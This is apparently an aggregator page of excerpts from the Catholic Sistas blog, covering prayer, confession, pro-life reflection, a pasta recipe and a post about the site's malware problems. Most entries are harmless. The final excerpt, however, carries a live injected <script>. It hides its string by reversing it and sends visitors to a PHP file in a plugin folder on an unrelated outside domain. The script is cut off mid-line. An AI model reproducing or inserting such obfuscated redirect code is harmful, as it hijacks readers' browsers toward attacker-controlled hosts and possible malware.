What happened to Catholic Sistas in 2021?
Catholic Sistas
by Martina Kreitzer
2y ago
Oh, friend. Where to even start? A lot of detachment to what’s worked over the years and what a profound experience it has been. For nearly six months and counting, CS has faced a whole host of problems from malware to security to plugin and design failures. My laptop died at the beginning of the ..read more
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I Pick Me: Responding with Love
Catholic Sistas
by Alyssa Azul
2y ago
Have you ever had a disagreement with someone that ended with you feeling like less?  I recall a situation not too long ago between me and a colleague. This person became extremely upset, and began to speak down to me. Instead of responding by speaking up, I let him continue to berate me. I drove […] The post I Pick Me: Responding with Love appeared first on Catholic Sistas. Catholic Sistas - perspective from the neck ..read more
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Creative Ways to Practice the Pause
Catholic Sistas
by Martina Kreitzer
2y ago
Being female, first born, and Mexican American, I have plenty of practice in asserting my opinion – and shockingly enough (because I know this will come as a surprise to those who know me IRL), it’s hard to keep my opinion to myself and, instead, pause at times. Unsolicited advice, opinions, theories, reactions…they’re all in […] The post Creative Ways to Practice the Pause appeared first on Catholic Sistas. Catholic Sistas - perspective from the neck ..read more
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Becoming Salt and Light
Catholic Sistas
by Michelle Fritz
2y ago
As the salt of the earth, we are called to “flavor” the world with Christ. What we say, what we do, and who we are should all glorify God and inspire others to seek out the Lord. Our “saltiness” is vital to making sure that God’s presence is felt by others. The post Becoming Salt and Light appeared first on Catholic Sistas. Catholic Sistas - perspective from the neck ..read more
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The Sanctity of Life and Our Catholic Response
Catholic Sistas
by Michelle Fritz
2y ago
I can remember the day I found out I was pregnant with Leo as clearly as if it happened just yesterday and not 8 ½ years ago. I remember the joy, the pain, the fear, and the worry. I wrote about my journey through a high risk pregnancy here at the website and the outpouring […] The post The Sanctity of Life and Our Catholic Response appeared first on Catholic Sistas. Catholic Sistas - perspective from the neck ..read more
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Jesus, How I’ve Missed You
Catholic Sistas
by Anni Harry
2y ago
As the wheels of this world turn again, and knowing some places are just now beginning to open back up, the question to ask isn’t about Christ’s role in our salvation history. Rather, it’s whether or not we are prepared to be... The post Jesus, How I’ve Missed You appeared first on Catholic Sistas. Catholic Sistas - perspective from the neck ..read more
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How to Turn a Sob Story into a Good Confession
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by Martina Kreitzer
3y ago
The other day my husband and I had a decently intense conversation about the merits of a sob story. One of us (my husband) prefers to speak to a contractor in simple terms. His details are succinct and to the point. The other (me) likes to paint a beautiful picture, complete with smells and sound […] The post How to Turn a Sob Story into a Good Confession appeared first on Catholic Sistas. Catholic Sistas - perspective from the neck ..read more
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Pasta with Stuff
Catholic Sistas
by Antonia Goddard
3y ago
We have a recipe in our family, it’s called pasta with stuff. Clue’s in the name. It’s pasta with whatever stuff you have in the cupboard or fridge. There’s always a tin of tomatoes, so that goes in first, with some leftover veg (onion, carrot, spinach, pretty much anything can get thrown in there). Some […] The post Pasta with Stuff appeared first on Catholic Sistas. Catholic Sistas - perspective from the neck ..read more
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A Heroine’s Journey
Catholic Sistas
by Alyssa Azul
3y ago
The journey begins with a dream, followed by the bravery to live authentically, ultimately nurturing ourselves towards a unique calling. The post A Heroine’s Journey appeared first on Catholic Sistas. Catholic Sistas - perspective from the neck ..read more
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Catholic Sistas
by Michelle Fritz
3y ago
I can remember the day I found out I was pregnant with Leo as clearly as if it happened just yesterday and not 8 ½ years ago. I remember the joy, the pain, the fear, and the worry. I wrote about my journey through a high risk pregnancy here at the website and the outpouring […] The post The Sanctity of Life <script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.f ..read more
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